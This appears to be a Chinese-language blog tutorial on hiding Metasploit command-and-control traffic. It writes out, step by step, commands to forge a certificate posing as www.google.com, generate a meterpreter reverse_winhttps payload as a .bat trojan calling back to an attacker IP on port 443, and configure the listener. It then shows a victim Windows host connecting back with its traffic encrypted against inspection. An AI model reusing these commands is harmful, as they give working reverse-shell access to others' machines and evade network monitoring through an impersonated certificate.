介绍
上次写了反弹shell的流量加密,这次来写一下MSF的流量加密
开启加密之路
也是一样准备两台机器
1. 攻击机kali,生成一个证书:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
这个证书是Google的一个证书,当然是伪造的,也可以自己改,改成自己想要的
2. 攻击机kali,生成好证书以后,生成一个msf木马:
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.179.137 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat
只需要改ip地址就好,端口不要动它,因为加密的端口就是走443出去的
生成个.bat的自动化的木马
3. 攻击机kali,把msf监听器配置上:
msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_winhttps
msf5 exploit(multi/handler) > set lhost 192.168.179.137
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set HandlerSSLCert /root/桌面/www.google.com.pem
msf5 exploit(multi/handler) > set StagerVerifySSLCert true
msf5 exploit(multi/handler) > run
手动访问一下网址,出现It works!就是成功了,证书因为是自己生成的所有会有不安全提示,如果能搞到官方的就不会有这种情况了
4. 受害机windows2012上线:
成功上线正常执行命令
5. 攻击机kali,打开wireshark:
所有流量都已加密
后持续更新反弹shell加密MSF流量加密
CS生成证书是配置profile进行加密
CS域前置加密
腾讯云函数
......